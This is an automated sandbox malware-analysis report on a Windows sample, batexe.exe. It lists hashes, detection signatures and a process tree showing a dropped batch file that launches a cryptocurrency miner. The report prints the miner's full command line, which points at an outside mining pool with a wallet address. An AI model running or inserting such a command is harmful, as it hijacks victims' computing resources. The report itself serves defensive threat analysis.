Analysis
-
max time kernel
299s -
max time network
304s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
19-02-2024 14:09
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240214-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 3144 b2e.exe 5708 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 5708 cpuminer-sse2.exe 5708 cpuminer-sse2.exe 5708 cpuminer-sse2.exe 5708 cpuminer-sse2.exe 5708 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/2396-9-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2396 wrote to memory of 3144 2396 batexe.exe 81 PID 2396 wrote to memory of 3144 2396 batexe.exe 81 PID 2396 wrote to memory of 3144 2396 batexe.exe 81 PID 3144 wrote to memory of 2740 3144 b2e.exe 82 PID 3144 wrote to memory of 2740 3144 b2e.exe 82 PID 3144 wrote to memory of 2740 3144 b2e.exe 82 PID 2740 wrote to memory of 5708 2740 cmd.exe 85 PID 2740 wrote to memory of 5708 2740 cmd.exe 85
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Users\Admin\AppData\Local\Temp\F637.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\F637.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\F637.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3144 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\88.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5708
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
6.9MB
MD5171891a8adf847249af2c516550384c3
SHA1241e8963e767dc91fb1ec738ce9bdb3081ade6b0
SHA2567e3048ce9943fb0cb9bf1c23fe1a1676d52cc99ae650a6781be26facccac5fff
SHA5124ae99d737e4f584f5a6b82229bf4c24abad3afee273c6115dcdc74b2d9ed56d13a0aac714192d8e477c38f896e7c5696f6b10d0f9c4d3aaf54c16918ddd0e6da
-
Filesize
2.6MB
MD564d755715f1c5d6c853e3bac99f37d2d
SHA1490635e724ad5eb7dd7c4e64f1b8f8db65b18bf7
SHA25640fe4f48290042bf3c5919937008e28461a22a27a8e66caf40313f875ed726c6
SHA5126d8ccb5cf0c8cf26b8a1981ccbdfa3cb49506f7c4f03f24c8471fdb1b3a8b1c312509b054c2112a32165b1bead97bb1f4efe44b031211db8e440e9c0a2dfdb4b
-
Filesize
2.6MB
MD5f39e075a3b06c0959c3e6737a5f8b61b
SHA170acaffc9a68e68c08aa4d5f4e7a8558d25c90ce
SHA25682d60182222aea29938394d46674a1273b4c36bc2128eda5d1e51d73c75f5a32
SHA5125aafae17479f96d0da92f5d3f19fca813e316e5aeea234a3bf247bed0f5aa713a9dcf7503daee6a3dc5a6d2ac358bc14d8df1400a0ac247c7793fea0905c7326
-
Filesize
1.5MB
MD57af1d3271ef5bf2b1fd29918d8b9922d
SHA1038b8b6ef87dbff71cc0ae740671f9cdbed25944
SHA256f2d997ea4ca000ba975777b9a5b9e90be401a7d4d4cb2cd20e67583939999cba
SHA512ad0672a9fab77825b1b5486a92f68133b2d91637296add9ee240ca4492e1d2e26b182f284becfe48849273cddff64be85253b8a0ac7081585a53cefc4f0125d9
-
Filesize
1.5MB
MD51425399e04d7f5ba0a288a42641d82c7
SHA1247fcd2fc199f111a4e2e6b5e0923474550285ff
SHA2568c661b9bde222da8ad5507debbaf869918b37d96a847e1631b4b328ec26ba6dd
SHA5127f6033b9ac054946e69cc7a4d0fbae37df8515191649105400c6a7cafefa6a8eda44b743a290f2a7a3d9038f41bc1588496fe74f4028dc08c569f55b75cd9b26
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
1.2MB
MD57cf672bee2afba2dcd0c031ff985958e
SHA16b82a205db080ffdcb4a4470fce85a14413f3217
SHA256c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
SHA5123e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
-
Filesize
1.8MB
MD5ede12298f008ac2303b101ffd5c99181
SHA1b4944ea68398a1fc0972e7c5757060f00ea8e800
SHA25689516e7be3ee574c335bb87fa9ae1d16afe583ebeed8f60d9c45f45d261f1a01
SHA5120677228c0a9ff52257c3a2d573dead9d4974efee8d03ec1f35a6062cdce1d9bcada6f857ac3f6942d406a1183ebeb1e3c520194872f4dbc330a9687dd65cf84a
-
Filesize
1.1MB
MD5df57c2649135e22278b38d92f7a60383
SHA1fefde9dcbf38546a2c9a16258300da3960f1c44b
SHA256cead9362c701e579596dd188d5b6397176fb88a37d2c404a5a07e03d50b11e85
SHA512a233a6d07cc01283f7b768a7b79bdd016d02522377acaae748f1513874c05641566433e1ba1b0c4f9a27a23e096d7c6ef1afc214d9810ebb5ba155ef4d605503
-
Filesize
1.4MB
MD5e514aba24d902e9258fbbe3c471d6eaf
SHA1b671f74533f4b43587fec6fdcd49094cb340ffda
SHA256ec943efbae6d2326e46de7fdd2abd641b5da242621522c9edc1b308ea11b320c
SHA512437bd8e20ef45de43723bb11c4a29b2a11902d10ff1983dde253be8d5cf7f88c097ecbd41aa58738086b2a60c1ea9341a5ad35d30326896b255a82aa69485445
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770